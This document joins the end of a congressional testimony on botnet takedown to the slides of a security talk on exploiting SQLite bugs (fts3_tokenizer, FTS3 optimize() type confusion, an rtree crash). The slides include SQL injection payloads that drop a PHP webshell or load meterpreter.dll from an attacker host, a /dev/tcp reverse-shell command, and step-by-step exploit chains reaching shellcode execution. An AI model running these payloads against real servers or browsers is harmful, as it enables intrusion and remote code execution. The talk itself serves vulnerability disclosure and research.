may be some subtleties involved in getting these embedded computers patched without triggering full recertification, there’s no question that these computers should not be connected to the open Internet, or that the staff’s first clue that they have a problem should not be a phone call from the Conficker Working Group. We are now a connected society, and we need to find more ways to front-load security protections into Internet-connected services and offerings. 
To this end, government should continue to support and encourage industry-led groups like M3AAWG – which has been active in publishing reports and developing voluntary practices aimed at strengthening and facilitating botnet detection and remediation – and public/private partnerships like NCFTA. V. CONCLUSION I’ve given a very brief overview of the botnet problem, its causes, its impact, and its likely future assuming we allow nature to take its course. I’d like to leave you with the following thoughts: 1. The Internet is the greatest invention in recorded history, in terms of its positive impact on human health, education, freedom, and on every national economy. 2. We have necessarily cut some corners on device and software safety and quality in order to innovate at breakneck speed from 1969 to now – time-to-market, not resistance to takeover, has often been our overriding engineering principle. 3. The Internet is also therefore the greatest invention in recorded history in terms of its negative impact on human privacy and freedom, as evidenced by the massive and continuing illicit transfer of wealth from productive people and countries toward unproductive people and countries. 4. Our democratic commitment to the rule of law has very little traction on the Internet compared to how the rule of law works in the real world. The Internet is borderless and lawless, but carries more of the world’s commerce every year. 5. These problems manifest as “botnets” which are networks of robots, where the robots in question are using our connected devices in ways we never agreed to. 6. Takedown of criminal infrastructure including “botnets” must be approached not just as reactions after the fact but also as prevention by attacking the underlying causes. 7. Takedown is no single agency’s or any single company’s job, and unilateralism never ends well in any case – so, cooperation and multilateralism must be our guiding lights. 8. The US Department of Justice is the envy of the world in its approach to takedown and its awareness of the technical and social subtleties involved, with a special shout-out to NCFTA, a public/private partnership with strong FBI ties. 9. No legislative or regulatory relief is sought in these remarks – the manner in which government and industry have coordinated and cooperated on botnet takedown efforts have underscored the effectiveness of public/private partnerships that afford all affected parties the necessary degree of flexibility and adaptability to face and eliminate botnet threats. Mr. Chairman, Ranking Member Graham and Members of the subcommittee, this concludes my written statement. Thank you again for this opportunity to speak before you today on this important topic, and I would be happy to answer your questions. 1 Conficker Working Group, http://confickerworkinggroup.org/wiki/ 2 Worm: The First Digital World War, Mark Bowden, 2011, ASIN B005IGBHU8 3 DNS Changer Working Group, http://www.dcwg.org/ 4 Securing the Edge, Paul Vixie, 2002, https://archive.icann.org/en/committees/security/sac004.txt
pdf
Many Birds, One Stone: Exploiting a Single SQLite Vulnerability Across Multiple Software Kun Yang(@KelwinYang) About us ● Beijing Chaitin Tech Co., Ltd(@ChaitinTech) ○ https://chaitin.cn/en ○ pentesting services and enterprise products ● Chaitin Security Research Lab ○ Pwn2Own 2017 3rd place ○ GeekPwn 2015/2016 awardees: PS4 Jailbreak, Android rooting ○ CTF players from team b1o0p, 2nd place at DEF CON CTF 2016 ● Acknowledgement ○ Siji Feng(a.k.a slipper) ○ Zhi Zhou(@CodeColorist) 2 SQLite “SQLite is a self-contained, high-reliability, embedded, full-featured, public-domain, SQL database engine. SQLite is the most used database engine in the world.” ● Storage backend for web browsers ● Programming language binding ● Web database ● Embedded database for mobile apps ● Database on IOT devices 3 Known Attacks on SQLite SQLite3 Injection Cheat Sheet ● Attach Database ○ ?id=bob'; ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<? system($_GET['cmd']); ?>';-- ● SELECT load_extension() ○ ?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 4 Memory Corruption SQLite database: file format with inevitable memory corruption bugs ● CVE-2015-7036 ○ Parsing a malformed database file will cause a heap overflow of several bytes in the function sqlite3VdbeExec() ● CVE-2017-10989 ○ mishandles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read 5 Memory Corruption SQLite interpreter: more flexible ways to trigger bugs in sql statements ● CVE-2015-3414 ○ SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, as demonstrated by COLLATE"""""""" at the end of a SELECT statement. ● CVE-2015-3415 ○ The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, as demonstrated by CHECK(0&O>O) in a CREATE TABLE statement. 6 Fuzzing SQLite Previous work of Michał Zalewski: AFL: Finding bugs in SQLite, the easy way ● Uninitialized pointers, bogus calls to free(), heap/stack buffer overflows ● 22 crashes in 30 min ● Now AFL is a standard part of SQLite testing strategy Example from his work sqlite-bad-free.sql (CVE-2015-3415) create table t0(o CHar(0)CHECK(0&O>O)); insert into t0; select randomblob(0)-trim(0); 7 AFL is not everything, we want deeper vulnerabilities. 8 Data Types in SQLite Every value in SQLite has one of five fundamental data types: ● 64-bit signed integer ● 64-bit IEEE floating point number ● string ● BLOB ● NULL 9 Virtual Table Mechanism ● A virtual table is an object that is registered with an open SQLite database connection. ● Queries and updates on a virtual table invoke callback methods of the virtual table object. ● It can be used for ○ representing in-memory data structures ○ representing a view of data on disk that is not in the SQLite format ○ computing the content for application on demand 10 Complicated Extensions Many features are introduced to SQLite as extensions ● Json1 - JSON Integration ● FTS5/FTS3 - Full Text Search ● R-Tree Module ● Sessions ● Run-Time Loadable Extensions ● Dbstat Virtual Table ● Csv Virtual Table ● Carray ● Generate_series ● Spellfix1 11 Complex Features vs Simple Type System Some extensions require complex data structures Internal data is stored in special tables of the same database This data can only be stored as BLOB type ● How can we know the original type of a BLOB? ● Should we trust the stored BLOB in database? 
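The two questions above are easy to make concrete outside the slides. The short illustration below is not from the original talk; it uses Python's built-in sqlite3 module to show that the engine records only the storage class of a value, so once an extension serializes an internal structure into a BLOB column, nothing distinguishes that blob from eight arbitrary bytes inserted by an attacker.

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE t (v)")
con.executemany("INSERT INTO t VALUES (?)",
                [(1,), (1.5,), ("one",), (b"\x41" * 8,), (None,)])

# typeof() reports only the storage class: integer, real, text, blob, or null.
for value, storage_class in con.execute("SELECT v, typeof(v) FROM t"):
    print(repr(value), "->", storage_class)

# A blob written by an extension and a blob written by an attacker both come
# back simply as 'blob'; whoever reads it has to trust its contents.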
12 Answers from SQLite source code How can we know the original type of a BLOB? ● We can infer the type from the column name or function argument name Should we trust the stored BLOB in database? ● Why not? 13 Case Study: CVE-2015-7036 FTS3 and FTS4 are SQLite virtual table modules that allow users to perform full-text searches on a set of documents. They allow users to create special tables with a built-in full-text index. An FTS tokenizer is a set of rules for extracting terms from a document or basic FTS full-text query. In addition to providing built-in "simple" and other tokenizers, FTS provides an interface for applications to implement and register custom tokenizers written in C. 14 Case Study: CVE-2015-7036 FTS does not expose a C-function that users call to register new tokenizer types with a database handle. Instead, the pointer must be encoded as an SQL blob value and passed to FTS through the SQL engine by evaluating a special scalar function. ● SELECT fts3_tokenizer(<tokenizer-name>); ● SELECT fts3_tokenizer(<tokenizer-name>, <sqlite3_tokenizer_module ptr>); 15 Passing and dereferencing pointer in SQL queries? Case Study: CVE-2015-7036 SQLite version 3.14.0 2016-07-26 15:17:14 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> select hex(fts3_tokenizer('simple')); 60DDBEE2FF7F0000 sqlite> select fts3_tokenizer('mytokenizer', x'4141414142424242'); AAAABBBB sqlite> select hex(fts3_tokenizer('mytokenizer')); 4141414142424242 16 Case Study: CVE-2015-7036 Info leak ● fts3_tokenizer returns the address of registered tokenizer as a BLOB, querying the built-in tokenizers can leak the base address of sqlite module. Untrusted pointer dereference ● fts3_tokenizer believes the second argument is always a valid pointer to a sqlite3_tokenizer_module, and it can never know the real type of the argument 17 The first easily exploitable sqlite memory corruption bug, and can be exploited through browsers! 18 Web SQL Database WebDatabase defines an API for storing data in databases that can be queried using a variant of SQL. All the browser that implement this API use SQLite3 as a backend. W3C has ceased maintaining the specification of WebDatabase, but it still remains available on latest Webkit (Safari) and Blink (Chromium). 19 Beware. This specification is no longer in active maintenance and the Web Applications Working Group does not intend to maintain it further. Web SQL Database var db = openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024); db.transaction(function(tx) { tx.executeSql('CREATE TABLE IF NOT EXISTS LOGS (id unique, log)'); tx.executeSql('INSERT INTO LOGS (id, log) VALUES (1, "foobar")'); tx.executeSql('INSERT INTO LOGS (id, log) VALUES (2, "logmsg")'); }); db.transaction(function(tx) { tx.executeSql('SELECT * FROM LOGS', [], function(tx, results) { var len = results.rows.length, i; for (i = 0; i < len; i++) { document.write("<p>" + results.rows.item(i).log + "</p>"); } }, null); }); 20 Open a database Enter a transaction Prepare tables Execute and read from a query Read column SQLite in browser is filtered The sqlite3_set_authorizer() interface registers a callback function that is invoked to authorize certain SQL statement actions. 
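Most SQLite language bindings expose the same callback, so the filtering idea is easy to prototype outside a browser. The sketch below is an illustration added here, far simpler than WebKit's DatabaseAuthorizer: it whitelists a handful of scalar functions and lets the authorizer reject everything else when the statement is prepared.

import sqlite3

WHITELISTED_FUNCTIONS = {"abs", "length", "hex", "count"}

def authorizer(action, arg1, arg2, db_name, trigger_or_view):
    if action == sqlite3.SQLITE_FUNCTION:
        # For SQLITE_FUNCTION the second argument carries the function name.
        return sqlite3.SQLITE_OK if arg2 in WHITELISTED_FUNCTIONS else sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

con = sqlite3.connect(":memory:")
con.set_authorizer(authorizer)

print(con.execute("SELECT hex(1)").fetchone())    # whitelisted, allowed
try:
    con.execute("SELECT randomblob(8)")           # not whitelisted, denied
except sqlite3.DatabaseError as err:
    print("blocked:", err)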
void SQLiteDatabase::enableAuthorizer(bool enable) { if (m_authorizer && enable) sqlite3_set_authorizer(m_db, SQLiteDatabase::authorizerFunction, m_authorizer.get()); 21 Database Authorizer FTS3 is the only allowed virtual table: int DatabaseAuthorizer::createVTable(const String& tableName, const String& moduleName) { ... // Allow only the FTS3 extension if (!equalLettersIgnoringASCIICase(moduleName, "fts3")) return SQLAuthDeny; 22 Database Authorizer Functions are whitelisted int DatabaseAuthorizer::allowFunction(const String& functionName) { if (m_securityEnabled && !m_whitelistedFunctions.contains(functionName)) return SQLAuthDeny; return SQLAuthAllow; } An authorizer bypass is needed to use fts3_tokenizer: CVE-2015-3659 (ZDI-15-291) 23 CVE-2015-3659 Authorizer whitelist bypass We can create a table that will execute privileged functions, by specifying a DEFAULT value for a column and then inserting into the table. var db = openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024); var sql = "hex(fts3_tokenizer('simple'))"; db.transaction(function (tx) { tx.executeSql('DROP TABLE IF EXISTS BAD;') tx.executeSql('CREATE TABLE BAD (id, x DEFAULT(' + sql + '));'); tx.executeSql('INSERT INTO BAD (id) VALUES (1);'); tx.executeSql('SELECT x FROM BAD LIMIT 1;', [], function (tx, results) { var val = results.rows.item(0).x; }); }, function(err) { log(err.message) }); 24 bypass fts3_tokenizer code execution in PHP ● Administrators usually set disable_functions to restrict the abilities of webshells disable_functions=exec,passthru,shell_exec,system,proc_open,popen,... ● PHP is not really sandboxed, all restrictions can be bypassed through native code execution 25 fts3_tokenizer code execution in PHP ● LAMP stack loads libphp and libsqlite3 as separated shared library, with version information it’s possible to recover the library maps from the leaked simple_tokenizer with (silly) hardcoded offsets 26 … 7fadb00fb000-7fadb01bc000 r-xp 00000000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb01bc000-7fadb03bb000 ---p 000c1000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb03bb000-7fadb03be000 r--p 000c0000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb03be000-7fadb03c0000 rw-p 000c3000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 … 7fadb6136000-7fadb6a34000 r-xp 00000000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6a34000-7fadb6c33000 ---p 008fe000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6c33000-7fadb6cde000 r--p 008fd000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6cde000-7fadb6ceb000 rw-p 009a8000 08:01 173493 /usr/lib/apache2/modules/libphp5.so ● There’s no perfect stack pivot gadget xCreate callback, but xOpen callback takes an argument from insert clause $db->exec("select fts3_tokenizer('simple', x'$spray_address'); create virtual table a using fts3; insert into a values('bash -c \"bash>/dev/tcp/127.1/1337 0<&1\"')"); ● To spray the struct, we can open the path :memory: and insert packed blob values into the in-memory table ● Some php runtime configuration can be set per directory using .htaccess, even when ini_set has been disabled. Some of these values are placed in continuous memory in .bss segment, like mysqlnd.net_cmd_buffer_size and mysqlnd.log_mask. We can use them to fake the structure. 
fts3_tokenizer code execution in PHP 27 fts3_tokenizer code execution in PHP ● Finally use the one-gadget in php to pop the shell .text:00000000002F137A mov rbx, rsi .text:00000000002F137D lea rsi, aRbLR+5 ; modes .text:00000000002F1384 sub rsp, 58h .text:00000000002F1388 mov [rsp+88h+var_74], edi .text:00000000002F138C mov rdi, rbx ; command .text:00000000002F138F mov [rsp+88h+var_58], rdx .text:00000000002F1394 mov rax, fs:28h .text:00000000002F139D mov [rsp+88h+var_40], rax .text:00000000002F13A2 xor eax, eax .text:00000000002F13A4 mov [rsp+88h+var_50], rcx .text:00000000002F13A9 mov [rsp+88h+var_48], 0 .text:00000000002F13B2 call _popen ● Too much hard coding, combined with other bugs will be much more reliable 28 Android has disabled fts3_tokenizer 29 Even SQLite itself 30 SQLite 3.11 has disabled the function by default WebKit has overridden the function now 31 Bonus The WebKit patch reveals more interesting functions /* ** The scalar function takes two arguments: (1) the number of dimensions ** to the rtree (between 1 and 5, inclusive) and (2) a blob of data containing ** an r-tree node. For a two-dimensional r-tree structure called "rt", to ** deserialize all nodes, a statement like: ** SELECT rtreenode(2, data) FROM rt_node; */ static void rtreenode(sqlite3_context *ctx, int nArg, sqlite3_value **apArg){ RtreeNode node; Rtree tree; tree.nDim = (u8)sqlite3_value_int(apArg[0]); tree.nDim2 = tree.nDim*2; tree.nBytesPerCell = 8 + 8 * tree.nDim; node.zData = (u8 *)sqlite3_value_blob(apArg[1]); 32 0day?! rtree extension has more fun. Unluckily, it’s not accessible from browsers. static int deserializeGeometry(sqlite3_value *pValue, RtreeConstraint *pCons){ ... memcpy(pBlob, sqlite3_value_blob(pValue), nBlob); ... if( pBlob->magic!=RTREE_GEOMETRY_MAGIC || nBlob!=nExpected ){ sqlite3_free(pInfo); return SQLITE_ERROR; } ... if( pBlob->cb.xGeom ){ pCons->u.xGeom = pBlob->cb.xGeom; 33 /* ** Value for the first field of every RtreeMatchArg object. The MATCH ** operator tests that the first field of a blob operand matches this ** value to avoid operating on invalid blobs (which could cause a segfault). */ #define RTREE_GEOMETRY_MAGIC 0x891245AB struct RtreeGeomCallback { int (*xGeom)(sqlite3_rtree_geometry*, int, RtreeDValue*, int*); ... }; PC control in 3 lines Process 37471 launched: '/usr/bin/sqlite3' (x86_64h) SQLite version 3.16.0 2016-11-04 19:09:39 sqlite> create virtual table x using rtree(a,b,c); sqlite> insert into x values(1,2,3); sqlite> select * from x where a match x’ab45128900000000414141414141414142424242424242424343434343434343444444444444444401000000000000004 54545454545454546464646464646464747474747474747’; Process 37471 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT) frame #0: 0x00007fffe0f740b4 libsqlite3.dylib`rtreeStepToLeaf + 1380 libsqlite3.dylib`rtreeStepToLeaf: -> 0x7fffe0f740b4 <+1380>: callq *0x8(%r8,%r9,8) 0x7fffe0f740b9 <+1385>: xorl %ecx, %ecx (lldb) x/xg $r8+$r9*8+8 0x100202258: 0x4141414141414141 (lldb) x/xg $rdi 0x100203590: 0x4444444444444444 34 We prefer exploitable bugs in browser! 35 Whitelist function optimize /* ** Implementation of the special optimize() function for FTS3. This ** function merges all segments in the database to a single segment. ** Example usage is: ** SELECT optimize(t) FROM t LIMIT 1; ** where 't' is the name of an FTS3 table. 
*/ static void fts3OptimizeFunc( sqlite3_context *pContext, /* SQLite function call context */ int nVal, /* Size of argument array */ sqlite3_value **apVal /* Array of arguments */ ){ int rc; /* Return code */ Fts3Table *p; /* Virtual table handle */ Fts3Cursor *pCursor; /* Cursor handle passed through apVal[0] */ if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; ... } 36 Type Confusion static int fts3FunctionArg( sqlite3_context *pContext, /* SQL function call context */ const char *zFunc, /* Function name */ sqlite3_value *pVal, /* argv[0] passed to function */ Fts3Cursor **ppCsr /* OUT: Store cursor handle here */ ){ Fts3Cursor *pRet; if( sqlite3_value_type(pVal)!=SQLITE_BLOB || sqlite3_value_bytes(pVal)!=sizeof(Fts3Cursor *) ){ char *zErr = sqlite3_mprintf("illegal first argument to %s", zFunc); sqlite3_result_error(pContext, zErr, -1); sqlite3_free(zErr); return SQLITE_ERROR; } memcpy(&pRet, sqlite3_value_blob(pVal), sizeof(Fts3Cursor *)); *ppCsr = pRet; return SQLITE_OK; } 37 FTS3 Tricks ● Virtual Table can have custom xColumn method in order to find the value of N-th column of current row. ○ int (*xColumn)(sqlite3_vtab_cursor*, sqlite3_context*, int N); ● FTS3 module accepts the table name as a column name. Some functions take the table name as the first argument. ○ SELECT optimize(t) FROM t LIMIT 1; ● However, when it’s not given with the correct column, it can still be compiled. ● The interpreter can never know the required type of column data. 38 Type Confusion SQLite version 3.14.0 2016-07-26 15:17:14 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> create virtual table a using fts3(b); sqlite> insert into a values(x'4141414142424242'); sqlite> select hex(a) from a; C854D98F08560000 sqlite> select optimize(b) from a; [1] 37515 segmentation fault sqlite3 39 What do we control? static void fts3OptimizeFunc( sqlite3_context *pContext, int nVal, sqlite3_value **apVal ){ int rc; Fts3Table *p; Fts3Cursor *pCursor; UNUSED_PARAMETER(nVal); assert( nVal==1 ); if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; rc = sqlite3Fts3Optimize(p); ... } 40 Let's take optimize() function as an example: ● With type confusion bug, we can specify arbitrary value for pCursor; ● If we can control memory in known address, we can construct Fts3Cursor struct, and other struct like Fts3Table; ● sqlite3Fts3Optimize will handle the fake instance; ● Do some code review to see if we can have memory RW or PC control. Exploitation Strategy 1. To have memory control in known address, heap spray is still available in modern browsers, e.g. by allocating a lot of JavaScript ArrayBuffer objects 2. Dereference Fts3Cursor at a specified and controlled location, where we can fake Fts3Cursor and other structs 3. Find a code path of optimize/offsets/matchinfo() for arbitrary RW primitive/PC control 41 One Exploitation Path for Arbitrary RW 42 fts3OptimizeFunc sqlite3Fts3Optimize sqlite3Fts3SegmentsClose sqlite3_blob_close sqlite3_finalize sqlite3VdbeFinalize sqlite3VdbeReset sqlite3ValueSetStr sqlite3VdbeMemSetStr This function is basically just doing "strcpy" with controlled arguments, by which we can achieve the following: Copy value from controlled location to any addr => Arbitrary write Copy value from any addr to controlled location => Arbitrary read sqlite3VdbeTransferError Let's start a long journey... 
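Before following the faked structures through that call chain, the entry point itself is easy to reproduce. The snippet below is an added illustration rather than material from the talk; it assumes an affected SQLite build with FTS3 compiled in (for example the 3.14 shell shown above), and on patched versions the query simply fails with an error instead of treating the blob as an Fts3Cursor pointer.

import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE VIRTUAL TABLE a USING fts3(b);
    INSERT INTO a VALUES (x'4141414142424242');  -- 8 bytes, sizeof(Fts3Cursor *)
""")

try:
    # On an affected build, fts3FunctionArg() memcpy()s these 8 bytes into an
    # Fts3Cursor pointer, so this dereferences 0x4242424241414141 and crashes.
    con.execute("SELECT optimize(b) FROM a").fetchall()
except sqlite3.Error as err:
    print("rejected or failed:", err)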
static void fts3OptimizeFunc( sqlite3_context *pContext, int nVal, sqlite3_value **apVal ){ int rc; Fts3Table *p; Fts3Cursor *pCursor; UNUSED_PARAMETER(nVal); assert( nVal==1 ); if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; rc = sqlite3Fts3Optimize(p); ... } 43 Fake a Fts3Cursor struct and all related structs in controlled (heap sprayed) memory. Added a Fts3Table to Fts3Cursor. Fts3Table ... Fts3Cursor pVtab ... ... sqlite3_vtab_c ursor sqlite3Fts3Optimize int sqlite3Fts3Optimize(Fts3Table *p){ int rc; rc = sqlite3_exec(p->db, "SAVEPOINT fts3", 0, 0, 0); if( rc==SQLITE_OK ){ rc = fts3DoOptimize(p, 1); if( rc==SQLITE_OK || rc==SQLITE_DONE ){ int rc2 = sqlite3_exec(p->db, "RELEASE fts3", 0, 0, 0); if( rc2!=SQLITE_OK ) rc = rc2; }else{ sqlite3_exec(p->db, "ROLLBACK TO fts3", 0, 0, 0); sqlite3_exec(p->db, "RELEASE fts3", 0, 0, 0); } } sqlite3Fts3SegmentsClose(p); return rc; } 44 let sqlite3_exec() != SQLITE_OK Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... let sqlite3_exec() != SQLITE_OK int sqlite3_exec( sqlite3 *db, const char *zSql, sqlite3_callback xCallback, void *pArg, char **pzErrMsg ){ int rc = SQLITE_OK; const char *zLeftover; sqlite3_stmt *pStmt = 0; char **azCols = 0; int callbackIsInit; if( !sqlite3SafetyCheckOk(db) ) return SQLITE_MISUSE_BKPT; if( zSql==0 ) zSql = ""; ... } int sqlite3SafetyCheckOk(sqlite3 *db){ u32 magic; if( db==0 ){ logBadConnection("NULL"); return 0; } magic = db->magic; if( magic!=SQLITE_MAGIC_OPEN ){ if( sqlite3SafetyCheckSickOrOk(db) ){ testcase( sqlite3GlobalConfig.xLog!=0 ); logBadConnection("unopened"); } return 0; }else{ return 1; } } 45 let sqlite3SafetyCheckOk() = 0 let db = 0 let p->db = 0 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... db = 0 ... Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... sqlite3Fts3SegmentsClose void sqlite3Fts3SegmentsClose(Fts3Table *p){ sqlite3_blob_close(p->pSegments); p->pSegments = 0; } int sqlite3_blob_close(sqlite3_blob *pBlob){ Incrblob *p = (Incrblob *)pBlob; int rc; sqlite3 *db; if( p ){ db = p->db; sqlite3_mutex_enter(db->mutex); rc = sqlite3_finalize(p->pStmt); sqlite3DbFree(db, p); sqlite3_mutex_leave(db->mutex); }else{ rc = SQLITE_OK; } return rc; } 47 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Vdbe ... sqlite3 ... mutex = 0 ... Fts3Table ... db = 0 ... pSegments ... ● Added a Incrblob to Fts3Table. ● Added a sqlite3(db) and a Vdbe to the Incrblob. sqlite3_finalize int sqlite3_finalize(sqlite3_stmt *pStmt){ int rc; if( pStmt==0 ){ rc = SQLITE_OK; }else{ Vdbe *v = (Vdbe*)pStmt; sqlite3 *db = v->db; if( vdbeSafety(v) ) return SQLITE_MISUSE_BKPT; sqlite3_mutex_enter(db->mutex); checkProfileCallback(db, v); rc = sqlite3VdbeFinalize(v); rc = sqlite3ApiExit(db, rc); sqlite3LeaveMutexAndCloseZombie(db); } return rc; } int sqlite3VdbeFinalize(Vdbe *p){ int rc = SQLITE_OK; if( p->magic==VDBE_MAGIC_RUN || p->magic==VDBE_MAGIC_HALT ){ rc = sqlite3VdbeReset(p); assert( (rc & p->db->errMask)==rc ); } sqlite3VdbeDelete(p); return rc; } 48 let p->magic == VDBE_MAGIC_HALT survive vdbeSafety()/checkProfileCallback() Structs 49 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... 
sqlite3VdbeReset int sqlite3VdbeReset(Vdbe *p){ sqlite3 *db; db = p->db; sqlite3VdbeHalt(p); if( p->pc>=0 ){ vdbeInvokeSqllog(p); sqlite3VdbeTransferError(p); sqlite3DbFree(db, p->zErrMsg); p->zErrMsg = 0; if( p->runOnlyOnce ) p->expired = 1; }else if( p->rc && p->expired ){ ... } Cleanup(p); p->iCurrentTime = 0; p->magic = VDBE_MAGIC_RESET; return p->rc & db->errMask; } 50 survive sqlite3VdbeHalt() p->pc >= 0 Structs Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... pc >= 0 ... sqlite3VdbeTransferError int sqlite3VdbeTransferError(Vdbe *p){ sqlite3 *db = p->db; int rc = p->rc; if( p->zErrMsg ){ db->bBenignMalloc++; sqlite3BeginBenignMalloc(); if( db->pErr==0 ) db->pErr = sqlite3ValueNew(db); sqlite3ValueSetStr(db->pErr, -1, p->zErrMsg, SQLITE_UTF8, SQLITE_TRANSIENT); sqlite3EndBenignMalloc(); db->bBenignMalloc--; db->errCode = rc; }else{ sqlite3Error(db, rc); } return rc; } void sqlite3ValueSetStr(sqlite3_value *v, int n, const void *z, u8 enc, void (*xDel)(void*) ){ if( v ) sqlite3VdbeMemSetStr((Mem *)v, z, n, enc, xDel); } 52 fake a db->pErr struct, and p->zErrMsg != 0 sqlite3VdbeMemSetStr int sqlite3VdbeMemSetStr(Mem *pMem, const char *z, int n, u8 enc, void (*xDel)(void*) ){ int nByte = n; ... if( nByte<0 ){ if( enc==SQLITE_UTF8 ){ nByte = sqlite3Strlen30(z); if( nByte>iLimit ) nByte = iLimit+1; } ... } if( xDel==SQLITE_TRANSIENT ){ int nAlloc = nByte; ... if( sqlite3VdbeMemClearAndResize(pMem, MAX(nAlloc,32)) ) return SQLITE_NOMEM_BKPT; memcpy(pMem->z, z, nAlloc); } ... return SQLITE_OK; } 53 sqlite3VdbeMemClearAndResize() will do: pMem->z = pMem->zMalloc; For memcpy(): z is a string pointer from Vdbe's zErrMsg pMem is a Mem struct, pMem->z also can be controlled by pMem->zMalloc. nAlloc is the length of string z. So we have a "strcpy" primitive with controlled arguments: source and destination. Structs 54 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... pc >= 0 ... zErrMsg ... Mem/ sqlite3_value ... zMalloc ... pErr ... Added a Mem struct to the sqlite3 struct. For strcpy primitive: zMalloc specifies the source, zErrMsg specifies the destination. One Exploitation Path For PC Control 55 fts3OptimizeFunc sqlite3Fts3Optimize sqlite3Fts3SegmentsClose sqlite3_blob_close sqlite3_finalize checkProfileCallback invokeProfileCallback invokeProfileCallback() will invoke many callbacks: xProfile/xTrace/xCurrentTime/xCurrentTimeint64. These callbacks call be controlled in sprayed memory. invokeProfileCallback static SQLITE_NOINLINE void invokeProfileCallback(sqlite3 *db, Vdbe *p){ sqlite3_int64 iNow; sqlite3_int64 iElapse; ... sqlite3OsCurrentTimeInt64(db->pVfs, &iNow); iElapse = (iNow - p->startTime)*1000000; if( db->xProfile ){ db->xProfile(db->pProfileArg, p->zSql, iElapse); } if( db->mTrace & SQLITE_TRACE_PROFILE ){ db->xTrace(SQLITE_TRACE_PROFILE, db->pTraceArg, p, (void*)&iElapse); } p->startTime = 0; } 56 We used callback db->xProfile because we can also control 2 arguments through db->pProfileArg and p->zSql To survive sqlite3OsCurrentTimeInt64(), we should construct db->pVfs of struct sqlite3_vfs, and nullify the callback db->Vfs->xCurrentTimeInt64. Structs 57 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 pVfs ... mutex = 0 pProfileArg xProfile ... Vdbe db ... 
magic = VDBE_MAGIC_HALT ... zSql ... We achieved arbitrary function call: xProfile specifies gadget address; pProfileArg specifies first argument; zSql specifies second argument ... xCurrentTimeInt64 ... sqlite3_vfs ASLR Bypass 58 sqlite> create virtual table a using fts3(b); sqlite> insert into a values(x'4141414142424242'); sqlite> select hex(a) from a; C854D98F08560000 ● By CVE-2017-6991 above, we leaked the address of a FTS3Cursor object ● The first member of struct FTS3Cursor points to a global variable fts3Module ● By arbitrary read primitive, we can read the address of fts3Module, which will reveal the address of sqlite library (at least, sometimes sqlite will be statically linked together with other libraries) Shellcode Execution ● With arbitrary function call primitive, invoke longjmp/mprotect gadget as below, to mark the memory pages of shellcode as executable ● Trigger the function call primitive again to jump to the shellcode 59 "Birds" 60 61 ● 62 ● 63 ● 64 ● Thank you! 65
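A note on the "ASLR Bypass" step above: CVE-2017-6991 leaks a FTS3Cursor pointer because hex(a) on the inserted fts3 row returns the raw little-endian bytes of that pointer. A minimal sketch of decoding the exact value shown on the slide (Python is used here purely for illustration):

import struct

leaked_hex = "C854D98F08560000"                 # value returned by: select hex(a) from a
cursor_addr = struct.unpack("<Q", bytes.fromhex(leaked_hex))[0]
print(hex(cursor_addr))                         # 0x56088fd954c8, address of the FTS3Cursor object

Since the first member of FTS3Cursor points at the global fts3Module, one arbitrary read from this address then yields a pointer inside the SQLite image, which reveals its load base as the slide describes.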
pdf
